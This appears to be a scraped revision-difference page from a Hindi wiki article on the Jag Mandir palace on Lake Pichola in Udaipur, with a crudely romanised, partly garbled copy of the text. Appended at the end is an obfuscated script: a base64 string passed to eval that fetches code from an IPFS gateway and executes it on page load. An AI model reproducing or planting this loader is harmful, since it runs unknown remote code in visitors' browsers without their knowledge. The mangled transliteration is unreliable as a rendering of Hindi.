Difference between revisions of "जग मंदिर उदयपुर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "{{राजस्थान}}" to "{{राजस्थान के पर्यटन स्थल}}")
Line 6: Line 6:
 
गोल महल की वास्तुकला तथा निर्माण-योजना [[मेवाड़]] शैली से अलग है। [[आगरा]] के प्रसिद्ध [[ताजमहल]] की निर्माण शैली को कुछ विद्वान इस इमारत से ही प्रभावित मानते हैं। इसके गुम्बद में पत्थर की पच्चीकारी का काम है और महल के सामने एक विशाल चौक है, जिसके मध्य में एक बड़ा हौज बना हुआ है। महाराणा संग्रामसिंह द्वितीय ने बाद में अपने समय में इसमें कई दालान तथा अन्य हिस्सों का निर्माण करवाया था। एक बहुत बड़े बगीचे के निर्माण हो जाने से इस महल की ख़ूबसूरती और भी बढ़ गई है।
 
गोल महल की वास्तुकला तथा निर्माण-योजना [[मेवाड़]] शैली से अलग है। [[आगरा]] के प्रसिद्ध [[ताजमहल]] की निर्माण शैली को कुछ विद्वान इस इमारत से ही प्रभावित मानते हैं। इसके गुम्बद में पत्थर की पच्चीकारी का काम है और महल के सामने एक विशाल चौक है, जिसके मध्य में एक बड़ा हौज बना हुआ है। महाराणा संग्रामसिंह द्वितीय ने बाद में अपने समय में इसमें कई दालान तथा अन्य हिस्सों का निर्माण करवाया था। एक बहुत बड़े बगीचे के निर्माण हो जाने से इस महल की ख़ूबसूरती और भी बढ़ गई है।
  
गोल महल के पूर्व में संगमरमर की केवल बारह बड़ी-बड़ी शिलाओं से बना हुआ एक महल है। इसी महल में महाराणा [[स्वरुप सिंह]] ने सन् 1857 में हुए सिपाही विद्रोह के समय नीमच के कई अंग्रेज़ अफसरों को रहने के लिए आश्रय दिया था।
+
गोल महल के पूर्व में संगमरमर की केवल बारह बड़ी-बड़ी शिलाओं से बना हुआ एक महल है। इसी महल में महाराणा [[स्वरुप सिंह]] ने सन 1857 में हुए सिपाही विद्रोह के समय नीमच के कई अंग्रेज़ अफसरों को रहने के लिए आश्रय दिया था।
  
 
==सम्बंधित लिंक==
 
==सम्बंधित लिंक==

Revision as of 11:24, 10 July 2010

[[chitr:Jag-Mandir-Palace.jpg|jag mandir pailes, udayapur
Jag Mandir Palace, Udaipur|thumb]] udayapur rajasthan ka ek khoobasoorat shahar hai. aur udayapur paryatan ka sabase akarshak sthal mana jata hai. jagamandir namak purane mahal jaganivas se karib adhe mil door dakshin mean ek doosare vishal tapoo par bane hue haian. udayapur mean yah pichhola jhil par bana ek any dvip pailes hai. udayapur ka yah mahal maharaja karan sianh dvara banavaya gaya tha, kiantu maharaja jagat sianh ne isaka vistar karaya. is mahal se bahut shanadar drishy dikhaee dete haian, yahaan ke goldan mahal ki suandarata durlabh aur bhavy hai.

jagamandir ke bahar talab ke kinare patthar ke hathiyoan ki ek pankti bani huee hai. ek guanbadakar chhat vala mahal jagamandir ke mukhy sthan par hai, jise gol mahal kahate haian. shahajada khurram (shahajahaan) apane pita jahaangir se vidroh kar kuchh samay ke lie yahian gol mahal mean raha tha. kuchh logoan ke anusar yah kaha gaya hai ki is mahal ko maharana karnasianh ne shahajahaan ke lie banavaya tha. lekin kuchh logoan ka yah manana hai ki jab shahajada khurram shahi fauj ka senapati banakar udayapur mean nivas kar raha tha tab is mahal ka nirman karavaya gaya tha.

gol mahal ki vastukala tatha nirman-yojana meva d shaili se alag hai. agara ke prasiddh tajamahal ki nirman shaili ko kuchh vidvan is imarat se hi prabhavit manate haian. isake gumbad mean patthar ki pachchikari ka kam hai aur mahal ke samane ek vishal chauk hai, jisake madhy mean ek b da hauj bana hua hai. maharana sangramasianh dvitiy ne bad mean apane samay mean isamean kee dalan tatha any hissoan ka nirman karavaya tha. ek bahut b de bagiche ke nirman ho jane se is mahal ki khoobasoorati aur bhi badh gee hai.

gol mahal ke poorv mean sangamaramar ki keval barah b di-b di shilaoan se bana hua ek mahal hai. isi mahal mean maharana svarup sianh ne san 1857 mean hue sipahi vidroh ke samay nimach ke kee aangrez aphasaroan ko rahane ke lie ashray diya tha.

sambandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>